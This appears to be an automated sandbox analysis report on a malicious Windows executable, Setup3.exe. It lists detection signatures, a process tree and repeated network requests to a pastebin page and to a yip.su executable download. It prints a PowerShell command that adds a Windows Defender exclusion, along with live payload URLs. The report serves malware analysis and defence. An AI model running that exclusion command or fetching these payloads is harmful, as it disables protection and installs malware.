Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup3.exe

Overview

General Information

Sample name:Setup3.exe
Analysis ID:1494267
MD5:cc5be4e36eec1b0c1248d6fa623c1d74
SHA1:73290347892d4261e3b037202ba42abd35895d27
SHA256:4f5033142672891d1c3fb48738b521560b1f3b19f1b1bc06c3ac7d78befbc6a5
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Disables UAC (registry)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Setup3.exe (PID: 2792 cmdline: "C:\Users\user\Desktop\Setup3.exe" MD5: CC5BE4E36EEC1B0C1248D6FA623C1D74)
    • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7840 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • InstallUtil.exe (PID: 6768 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • RegSvcs.exe (PID: 7200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegAsm.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • jsc.exe (PID: 7248 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • jsc.exe (PID: 7260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • WerFault.exe (PID: 7368 cmdline: C:\Windows\system32\WerFault.exe -u -p 2792 -s 1104 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2234066396.000001AAD51D6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      Process Memory Space: Setup3.exe PID: 2792JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: Setup3.exe PID: 2792JoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          SourceRuleDescriptionAuthorStrings
          8.2.jsc.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            0.2.Setup3.exe.1aad4c81270.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.2.Setup3.exe.1aad4c83cd8.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup3.exe", ParentImage: C:\Users\user\Desktop\Setup3.exe, ParentProcessId: 2792, ParentProcessName: Setup3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, ProcessId: 3872, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup3.exe", ParentImage: C:\Users\user\Desktop\Setup3.exe, ParentProcessId: 2792, ParentProcessName: Setup3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, ProcessId: 3872, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Setup3.exe", ParentImage: C:\Users\user\Desktop\Setup3.exe, ParentProcessId: 2792, ParentProcessName: Setup3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Setup3.exe" -Force, ProcessId: 3872, ProcessName: powershell.exe
                Timestamp:2024-08-18T00:08:11.141189+0200
                SID:2803305
                Severity:3
                Source Port:49714
                Destination Port:443
                Protocol:TCP
                Classtype:Unknown Traffic

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Setup3.exeAvira: detected
                Source: https://pastebin.com/raw/V6VJsrV3Avira URL Cloud: Label: malware
                Source: https://yip.su/RNWPd.exeAvira URL Cloud: Label: malware
                Source: yip.suVirustotal: Detection: 7%Perma Link
                Source: https://pastebin.com/raw/V6VJsrV3Virustotal: Detection: 7%Perma Link
                Source: http://yip.suVirustotal: Detection: 7%Perma Link
                Source: https://yip.suVirustotal: Detection: 7%Perma Link
                Source: https://yip.su/RNWPd.exeVirustotal: Detection: 15%Perma Link
                Source: Setup3.exeReversingLabs: Detection: 52%
                Source: Setup3.exeVirustotal: Detection: 64%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Setup3.exeJoe Sandbox ML: detected

                Exploits

                barindex
                Source: Yara matchFile source: 00000000.00000002.2234066396.000001AAD51D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2234066396.000001AAD4C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Setup3.exe PID: 2792, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.76.57:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: Setup3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: mscorlib.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.pdb0 source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: mscorlib.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Core.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1774.tmp.dmp.12.dr
                Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.ni.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Drawing.pdbH source: WER1774.tmp.dmp.12.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER1774.tmp.dmp.12.dr
                Source: Binary string: System.Core.ni.pdb source: WER1774.tmp.dmp.12.dr

                Networking

                barindex
                Source: unknownDNS query: name: pastebin.com
                Source: Yara matchFile source: 8.2.jsc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Setup3.exe.1aad4c81270.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Setup3.exe.1aad4c83cd8.2.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 172.67.188.178 172.67.188.178
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: iplogger.com
                Source: unknownDNS query: name: iplogger.com
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.20.4.235:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /1djqU4 HTTP/1.1Host: iplogger.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /RNWPd.exe HTTP/1.1Host: yip.suConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
